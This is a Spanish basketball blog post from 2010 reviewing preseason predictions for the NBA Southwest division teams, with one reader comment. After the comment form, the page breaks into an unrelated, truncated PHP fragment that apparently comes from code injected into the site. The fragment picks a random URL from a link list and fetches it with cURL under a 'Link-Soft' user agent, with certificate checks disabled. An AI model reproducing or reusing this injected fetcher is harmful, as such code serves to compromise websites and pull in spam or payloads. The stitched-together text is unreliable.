Revisando los pronósticos t2010: Southwest

01 de March de 2010 por TheDeerHunter

Dallas Mavericks: Hablamos de los líderes destacados de la división más dura de todas. Dicen de ellos que son los grandes ganadores del periodo de traspasos de mitad de temporada y es que algunos, ahora, los situan de lleno en la terna de candidatos finales al anillo. Con todas las mejoras que han incorporado, algunas muy significativas, entendemos que el pronóstico que dimos en su día es todavía vigente. Y es que todavía queda por demostrar que efectivamente son más potentes que Lakers o Nuggets, con nombres como Jazz, Spurs o Suns que harán bien en seguir respetando para un hipotético cruce. La 2ª ronda sigue siendo crítica para decidir si ha merecido la pena jugárselo todo a esta carta.

Lo mejor: Alrededor de Nowitzki están Kidd, Terry, Butler, Marion, Haywood, Barea, Stevenson,  Tim Thomas, Dampier… No será por nombres.

Lo peor: Ciertos momentos de inconsistencia, sobre todo en el American Airlines. Son el peor líder de división en diferencial anotados/recibidos. Se ha demostrado lo que era Josh Howard para este equipo. Un lastre.

San Antonio Spurs: Hay un run-run de que los Spurs, quizás junto a los Celtics, son la gran decepción de entre los candidatos al anillo y de que ninguno de los dos va a llegar muy lejos en postemporada. En San Antonio, durante los últimos años, se han hecho siempre las cosas bien. Este año no creemos era una excepción, pero hay veces que las cosas no terminan de salir como está previsto. Y es que sus novedades más potentes, Jefferson y McDyess no han terminado de aportar el plus que necesitaban, como también a varios miembros de la vieja guardia les está costando mucho mostrar un nivel aceptable. Como consecuencia inconsistencia, que queda reflejada en números con un aumento casi bochornoso de los puntos encajados por partido con respecto a su edad dorada. Posiblemente nos pasamos algún que otro pueblo pronosticándoles una final de conferencia, pero queremos comprobar quién es el valiente que les entierra.

Lo mejor: Duncan y las islas vírgenes que nos lo dieron. Debemos disfrutarlo al máximo mientras todavía estamos a tiempo. Nos agrada también DeJuan Blair, ilustrísimo y justo MVP del all-star de los rookies.

Lo peor: Esa defensa hace aguas y el equipo se tambalea en la clasificación. Las peores críticas se ceban con Jefferson, pero no es lo único que no termina de funcionar en esta ecuación.

New Orleans Hornets: Clavamos el “luchando por la 8ª plaza del Oeste”, pero debemos confesar que no podíamos tener ni papa sobre todas las eventualidades positivas y negativas que han terminado derivando en este provisional resultado. No contábamos con los problemas físicos que lleva arrastrando gran parte de la temporada Chris Paul causados, pienso yo, porque era él mi baza en una de las ligas fantásticas que mal-gestiono. No contábamos tampoco con la irrupción de Marcus Thornton y de Darren Collison como activos de primer orden en el presente y futuro de la franquicia. Sí esperábamos algo más de Okafor, como quizás algo menos de algún otro. Que se vayan unas cosas por otras… si tienen la suerte de recuperar a tiempo a CP3 al máximo nivel igual alcanzan postemporada. Que no esperen en ningún caso un objetivo mayor a ese.

Lo mejor: El sensacional “dúo dinámico” de rookies. Se han adaptado sensacionalmente a las circunstancias y pueden ser un buen punto de partida para un futuro mejor.

Lo peor: El límite de esta plantilla, aún con Chris Paul perfectamente sano, no podría ir más allá de una hipotética primera ronda. Esto es muy poco para mantener tan contento a un tipo de la calidad y ambición de Paul. Okafor no ha logrado en ningún momento hacer olvidar a Chandler.

Memphis Grizzlies: Se puede estar fuera o muy fuera de playoffs y el matiz puede ser fundamental en este caso. Les dimos mucha caña a los Ositos. Nuestro bombardeo preventivo no dejó mucho títere con cabeza. Nos parecía el eje del mal de los chupones. El pobre Marc se iba a morir de inanición en un equipo donde parecía hacer falta varios balones. No, Iverson no cuajó… pero sí lo hizo Zach Randolph, otro de los “apestados” por éste nuestro blog. Y vaya si lo hizo. No muchos hubieran adivinado la extraordinaria pareja interior que iba a terminar formando con Marc. Y partiendo desde ahí, los Grizzlies más competitivos desde que traspasaran a Pau. No podemos asegurar que terminarán reventando (más aún) nuestros pronósticos clasificando para postemporada pero sí que podemos decir lo intentarán y que hoy en día es un equipo respetado.

Lo mejor: El nivel all-star de Randolph. Marc Gasol es candidato a jugador más mejorado. Rachas de juego brillantes.

Lo peor: Que juegan en la Southwest. Si lo hicieran en el este estarían cómodamente metidos en playoffs.

Houston Rockets: Definitivamente todos los integrantes de la Southwest son huesos duros. Por momentos vaya si lo han sido los Houston Rockets en los que llegamos a pensar podía estar el entrenador del año. Sin Yao les veíamos un equipo demasiado limitado, pero a base de trabajo duro y humildad nunca han sido comparsas de nadie, como ya dijimos en su día, y están peleando duro por colarse en postemporada. Sin embargo, efectivamente la falta de pegada se ha terminado notando. Desde el momento que no encontraron hueco para un jugador como McGrady parece que se desorientaron un poco. Ariza tampoco ha terminado de explotar y en el traspaso de T-Mac tuvieron que ceder a Landry, de los máximos destacados. Kevin Martin no ha aportado todavía el nivel que se le presupone. Puede ser el revulsivo.

Lo mejor: Con todas sus limitaciones sigue siendo un rival muy incómodo… y todavía no han dicho la última palabra.

Lo peor: Con el asunto McGrady da la sensación que han perdido una oportunidad única para reforzar el equipo. El traspaso no ha terminado de resolverse del todo satisfactoriamente para ellos. Parece que hubieran podido sacar algo más.

Comenta

Un comentario a esta entrada

  1. Love Denise dice:
    #1

    muy buenos son estos articulos de la revisión de pronosticos. Enhorabuena.

    Creo que los Spurs y los Celtics necesitan un relevo generacional, tienen mucho viejuno por metro cuadrado en el vestuario, y éste verano es un buen momento para renovar el equipo, ya que disponen de margen salarial, en el caso de los Spurs, unos 23 millones de expiring…. y Ginobili suena para el Real Madrid.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>